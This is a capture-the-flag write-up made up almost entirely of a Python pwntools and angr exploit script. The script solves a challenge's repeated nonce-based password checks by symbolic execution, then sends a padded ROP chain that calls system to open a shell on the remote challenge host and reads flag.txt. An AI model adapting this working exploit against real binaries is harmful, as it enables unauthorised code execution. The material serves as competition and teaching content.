Tags: pwn angr rop 

Rating:

```python
import angr
import claripy
import sys
from pwn import *

logging.getLogger('angr').setLevel(logging.WARNING)
logging.getLogger('os').setLevel(logging.WARNING)
logging.getLogger('pwnlib').setLevel(logging.WARNING)

binary = args.BIN
context.terminal = ["tmux", "splitw", "-h"]
e = context.binary = ELF(binary)
r = ROP(e)

gs = '''
continue
'''

def start():
if args.GDB:
return gdb.debug(e.path, gdbscript=gs)
elif args.REMOTE:
return remote('0.cloud.chals.io', 14011)
else:
return process(e.path)

p = start()

def solve(t):

p.recvuntil(b'Nonce 1:')
random_val1 = int(p.recvline())
info('Nonce 1: %i' % random_val1)
p.recvuntil(b'Nonce 2:')
random_val2 = int(p.recvline())
info('Nonce 2: %i' % random_val2)

project = angr.Project(binary)

start_address = 0x40155e
initial_state = project.factory.blank_state(
addr=start_address,
add_options={angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,
angr.options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS}
)

password = claripy.BVS('', 64)

initial_state.regs.rdi = random_val1
initial_state.regs.rsi = random_val2
initial_state.regs.rdx = t
initial_state.regs.rcx = password

simulation = project.factory.simgr(initial_state)

def is_successful(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return 'Correct.'.encode() in stdout_output

def should_abort(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return 'Incorrect.'.encode() in stdout_output

simulation.explore(find=is_successful, avoid=should_abort)

if simulation.found:
solution_state = simulation.found[0]
solution = solution_state.solver.eval(password)
info("Found solution: %i" % solution)
p.sendline(b'%i' % solution)
warn('Sent solution: %i for iteration: %i' % (solution, t))
p.recvuntil(b'Continuing')
else:
raise Exception('Could not find the solution')

for i in range(1, 100):
solve(i)

p.recvuntil(b'Throw Your Exploit')
print("Throwing Exploit")

pop_rdi = p64((r.find_gadget(['pop rdi', 'ret']))[0])
bin_sh = p64(e.sym['shell'])
system = p64(e.sym['system'])

pad = cyclic(16)
chain = pop_rdi
chain += bin_sh
chain += system

p.sendline(pad+chain)

p.sendline(b'cat flag.txt')
p.interactive()```

Original writeup (https://github.com/tj-oconnor/cyber-open-2022/blob/main/pwn/problems/pwn-problems.py).